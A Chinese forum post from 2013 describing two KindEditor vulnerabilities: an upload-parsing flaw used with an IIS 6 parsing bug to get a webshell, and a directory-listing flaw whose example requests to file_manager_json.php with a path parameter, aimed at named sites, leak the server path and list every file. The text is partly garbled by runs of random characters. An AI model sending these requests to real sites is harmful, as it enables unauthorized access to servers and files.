KindEditor上传解析漏洞 影响版本:= kindeditor 3.2.1(09年8月份发布的最新版) 漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL KindEditor列目录漏洞 测试版本:KindEditor 3.4.2 KindEditor 3.5.5 1.http://www.political-security.com/67cms/kindeditor/php/file_man
1 z! V0 [* w! I9 ]
. i* I0 l& h. N. W( Z KindEditor上传解析漏洞 影响版本:<= kindeditor 3.2.1(09年8月份发布的最新版) 漏洞利用:利用windows 2003 IIS解析漏洞拿WEBSHELL
6 \" l, Z, p3 Z, R4 H) M& ^% S1 R/ j1 h4 J) h
KindEditor列目录漏洞 测试版本:KindEditor 3.4.2 KindEditor 3.5.5 - http://www.political-security.com/67cms/kindeditor/php/file_manager_json.php?path=/
- //path=/,爆出绝对路径D:AppServwww67cmskindeditorphpfile_manager_json.php
- 2.http://netknight.in/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
- //根据爆出的绝对路径,修改path的值为AppServ/www/67cms/
- 这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名
' C: O' D% J6 g) k! U% |
8 Z$ H- }& X6 i1 C1 F6 s, Y; I
( P$ W6 O% A4 N7 K- Y0 A& U. F
; U3 N, L1 }! h2 w5 P+ N
. f1 X2 v% i, H% a; z# f% Y. S
|
发表于 2013-1-23 09:16:19
收藏
支持
反对